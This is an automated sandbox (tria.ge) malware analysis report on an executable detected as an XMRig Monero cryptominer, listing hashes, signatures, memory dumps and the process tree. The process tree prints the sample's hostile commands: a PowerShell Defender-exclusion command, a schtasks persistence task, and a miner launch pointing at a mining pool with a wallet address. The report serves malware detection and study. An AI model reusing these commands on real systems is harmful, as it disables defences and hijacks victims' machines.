Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    90s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220812-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
  • submitted
    02/02/2023, 09:18

General

  • Target

    ad8302cc27bcb2b8701aa1cce10c6b08ebef18aee1c77853e6d76a90558957f0.exe

  • Size

    3.4MB

  • MD5

    2e650376cd95f186c48b3c2a55e73129

  • SHA1

    db0dd8ab08d23e64d4ade4c0f9e900252fcaa4d7

  • SHA256

    ad8302cc27bcb2b8701aa1cce10c6b08ebef18aee1c77853e6d76a90558957f0

  • SHA512

    ef241f8bdff2bd9d2bf7c2c86e715fcdcda0bad3578bbaffd540c916394e1b33f1cf6664001dd687adefb51fae4fe70a384b5d2291777fc5038a98fbded74265

  • SSDEEP

    98304:/dHXuzq3zvG40UcGwOI54HPXVk79/Cyf31DA0R:F3uzczaUx/I54H/0/

Score
10/10

Malware Config

Signatures

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • .NET Reactor proctector 1 IoCs

    Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.

  • XMRig Miner payload 6 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Uses the VBS compiler for execution 1 TTPs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of WriteProcessMemory 20 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\ad8302cc27bcb2b8701aa1cce10c6b08ebef18aee1c77853e6d76a90558957f0.exe
    "C:\Users\Admin\AppData\Local\Temp\ad8302cc27bcb2b8701aa1cce10c6b08ebef18aee1c77853e6d76a90558957f0.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of SetThreadContext
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2220
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4280
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "SRIKA" /tr "C:\ProgramData\versionApp\SRIKA.exe"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1140
      • C:\Windows\system32\schtasks.exe
        schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "SRIKA" /tr "C:\ProgramData\versionApp\SRIKA.exe"
        3⤵
        • Creates scheduled task(s)
        PID:4752
    • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -o xmr-eu1.nanopool.org:14433 -u 4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQoBJqYKAGMEQrLE8L8 --tls --coin monero
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of FindShellTrayWindow
      PID:4392

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/2220-152-0x0000000000510000-0x000000000095A000-memory.dmp

    Filesize

    4.3MB

  • memory/2220-135-0x00007FFE6BE40000-0x00007FFE6BEDE000-memory.dmp

    Filesize

    632KB

  • memory/2220-138-0x00007FFE6B910000-0x00007FFE6BAB1000-memory.dmp

    Filesize

    1.6MB

  • memory/2220-136-0x00007FFE67B70000-0x00007FFE67B82000-memory.dmp

    Filesize

    72KB

  • memory/2220-140-0x0000000000510000-0x000000000095A000-memory.dmp

    Filesize

    4.3MB

  • memory/2220-159-0x00007FFE69020000-0x00007FFE6905B000-memory.dmp

    Filesize

    236KB

  • memory/2220-141-0x00000000031D0000-0x0000000003211000-memory.dmp

    Filesize

    260KB

  • memory/2220-142-0x00007FFE6B430000-0x00007FFE6B45B000-memory.dmp

    Filesize

    172KB

  • memory/2220-143-0x0000000000510000-0x000000000095A000-memory.dmp

    Filesize

    4.3MB

  • memory/2220-144-0x00007FFE4D7D0000-0x00007FFE4D91E000-memory.dmp

    Filesize

    1.3MB

  • memory/2220-145-0x00007FFE6A410000-0x00007FFE6A437000-memory.dmp

    Filesize

    156KB

  • memory/2220-146-0x00007FFE4EFE0000-0x00007FFE4FAA1000-memory.dmp

    Filesize

    10.8MB

  • memory/2220-158-0x00007FFE6B7A0000-0x00007FFE6B80B000-memory.dmp

    Filesize

    428KB

  • memory/2220-157-0x00007FFE48FD0000-0x00007FFE490D2000-memory.dmp

    Filesize

    1.0MB

  • memory/2220-156-0x00007FFE4FEE0000-0x00007FFE4FF15000-memory.dmp

    Filesize

    212KB

  • memory/2220-139-0x00007FFE4EFE0000-0x00007FFE4FAA1000-memory.dmp

    Filesize

    10.8MB

  • memory/2220-151-0x00000000031D0000-0x0000000003211000-memory.dmp

    Filesize

    260KB

  • memory/2220-134-0x00007FFE4FAB0000-0x00007FFE4FB5A000-memory.dmp

    Filesize

    680KB

  • memory/2220-137-0x00007FFE4EF20000-0x00007FFE4EFDD000-memory.dmp

    Filesize

    756KB

  • memory/2220-153-0x00007FFE4EFE0000-0x00007FFE4FAA1000-memory.dmp

    Filesize

    10.8MB

  • memory/4280-150-0x00007FFE4EFE0000-0x00007FFE4FAA1000-memory.dmp

    Filesize

    10.8MB

  • memory/4280-149-0x00007FFE4EFE0000-0x00007FFE4FAA1000-memory.dmp

    Filesize

    10.8MB

  • memory/4280-148-0x000001C2627C0000-0x000001C2627E2000-memory.dmp

    Filesize

    136KB

  • memory/4392-167-0x0000000140000000-0x00000001407C9000-memory.dmp

    Filesize

    7.8MB

  • memory/4392-160-0x0000000140000000-0x00000001407C9000-memory.dmp

    Filesize

    7.8MB

  • memory/4392-164-0x00000195BF2C0000-0x00000195BF2E0000-memory.dmp

    Filesize

    128KB

  • memory/4392-163-0x0000000140000000-0x00000001407C9000-memory.dmp

    Filesize

    7.8MB

  • memory/4392-165-0x0000000140000000-0x00000001407C9000-memory.dmp

    Filesize

    7.8MB

  • memory/4392-166-0x00000195C0CC0000-0x00000195C0D00000-memory.dmp

    Filesize

    256KB

  • memory/4392-162-0x0000000140000000-0x00000001407C9000-memory.dmp

    Filesize

    7.8MB

  • memory/4392-168-0x0000019653150000-0x0000019653170000-memory.dmp

    Filesize

    128KB

  • memory/4392-169-0x0000019653380000-0x00000196533A0000-memory.dmp

    Filesize

    128KB

  • memory/4392-171-0x0000019653380000-0x00000196533A0000-memory.dmp

    Filesize

    128KB

  • memory/4392-170-0x0000019653150000-0x0000019653170000-memory.dmp

    Filesize

    128KB